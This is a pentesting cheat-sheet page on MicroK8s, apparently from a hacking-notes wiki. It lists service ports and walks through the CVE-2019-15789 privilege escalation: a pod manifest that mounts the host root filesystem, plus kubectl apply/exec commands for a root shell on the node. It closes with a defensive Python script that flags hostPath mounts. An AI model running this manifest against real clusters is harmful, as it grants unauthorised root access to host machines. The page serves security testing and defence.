# MicroK8s Pentesting

MicroK8s is a small, fast, single-package Kubernetes for developers.

### Ports and Services <a href="#ports-and-services" id="ports-and-services"></a>

* Port 10250 - kubelet
* Port 10255 - kubelet (read only)
* Port 10257 - kube-controller
* Port 10259 - kube-scheduler
* Port 16443 - API server
* Port 25000 - cluster-agent
* Port 32000 - Docker registry

### Docker Registry (port 32000) <a href="#docker-registry-port-32000" id="docker-registry-port-32000"></a>

It is the same as [Docker Registry Pentesting](https://hamcodes.gitbook.io/hackersnotes/cloud-hacking/docker-and-and-kubernetes/docker-registry-pentesting).

### Investigation from Inside <a href="#investigation-from-inside" id="investigation-from-inside"></a>

```shellscript
# Version
snap info microk8s
```

### Privilege Escalation (CVE-2019-15789) ≤ 1.15.2 <a href="#privilege-escalation-cve-2019-15789-1152" id="privilege-escalation-cve-2019-15789-1152"></a>

See [the post](https://pulsesecurity.co.nz/advisories/microk8s-privilege-escalation) for details.

#### 1. Create a Pod Yaml File <a href="#id-1-create-a-pod-yaml-file" id="id-1-create-a-pod-yaml-file"></a>

Replace the value of `spec.containers.image` with an image found on the target system, and save the manifest as `exploit.yaml`.

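```yaml
apiVersion: v1
kind: Pod
metadata:
  name: hostmount
spec:
  containers:
  - name: shell
    image: ubuntu:latest
    # Keep the container alive so we can exec into it
    command:
      - "/bin/bash"
      - "-c"
      - "sleep 10000"
    # The host filesystem appears inside the container at /opt/root
    volumeMounts:
      - name: root
        mountPath: /opt/root
  volumes:
  # hostPath volume exposing the node's root directory
  - name: root
    hostPath:
      path: /
      type: Directory
```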

#### 2. Apply the Yaml and Get a Root Shell <a href="#id-2-apply-the-yaml-and-get-a-root-shell" id="id-2-apply-the-yaml-and-get-a-root-shell"></a>

```shellscript
microk8s kubectl apply -f exploit.yaml
# "hostmount" is the value of the metadata.name in the exploit.yaml
microk8s kubectl exec -it hostmount -- /bin/bash
```

#### 3. Explore Directories <a href="#id-3-explore-directories" id="id-3-explore-directories"></a>

After getting a shell, we can explore the host's filesystem under `/opt/root`, where the hostPath volume is mounted.

```shellscript
cd /opt/root
```
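From the defender's side, the pod in steps 1-3 is recognizable by a `hostPath` volume mounted into a container. The following is an added example, not code from the original page or the advisory: it audits the JSON printed by `microk8s kubectl get pods --all-namespaces -o json` for such mounts. The function names, the severity labels and the sensitive-path list are assumptions made for this example, and the sample input is constructed.

```python
import json
import posixpath

# Host trees treated as high-risk here; an illustrative list, extend as needed.
SENSITIVE_PREFIXES = ("/etc", "/root", "/home", "/var/run", "/var/lib/kubelet", "/var/snap/microk8s")

def classify_host_path(path):
    """'critical' for the host root, 'high' for sensitive trees, else 'review'."""
    norm = posixpath.normpath("/" + path.strip("/"))  # collapses '//', '..', trailing '/'
    if norm == "/":
        return "critical"
    if any(norm == p or norm.startswith(p + "/") for p in SENSITIVE_PREFIXES):
        return "high"
    return "review"

def find_hostpath_mounts(pod_list):
    """Return one finding per container that mounts a hostPath volume."""
    findings = []
    for pod in pod_list.get("items", []):
        meta, spec = pod.get("metadata", {}), pod.get("spec", {})
        host_vols = {v["name"]: v["hostPath"].get("path", "/")
                     for v in spec.get("volumes", []) if v.get("hostPath")}
        for c in spec.get("initContainers", []) + spec.get("containers", []):
            for m in c.get("volumeMounts", []):
                if m.get("name") in host_vols:
                    path = host_vols[m["name"]]
                    findings.append({
                        "pod": f'{meta.get("namespace", "default")}/{meta.get("name")}',
                        "container": c.get("name"),
                        "host_path": path,
                        "mount_path": m.get("mountPath"),
                        "read_only": bool(m.get("readOnly", False)),
                        "severity": classify_host_path(path),
                    })
    return findings

# Constructed sample in the shape of `kubectl get pods -o json` output.
SAMPLE = json.loads("""
{"items": [
 {"metadata": {"name": "hostmount", "namespace": "default"},
  "spec": {"containers": [{"name": "shell", "volumeMounts": [{"name": "root", "mountPath": "/opt/root"}]}],
           "volumes": [{"name": "root", "hostPath": {"path": "/", "type": "Directory"}}]}},
 {"metadata": {"name": "web", "namespace": "default"},
  "spec": {"containers": [{"name": "nginx", "volumeMounts": [{"name": "cache", "mountPath": "/cache"}]}],
           "volumes": [{"name": "cache", "emptyDir": {}}]}}
]}
""")

if __name__ == "__main__":
    for finding in find_hostpath_mounts(SAMPLE):
        print(finding)
```

A read-only mount of the host root is still reported as critical, since it exposes every file on the node to the container.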

### References <a href="#references" id="references"></a>

* [MicroK8s](https://microk8s.io/docs/services-and-ports)
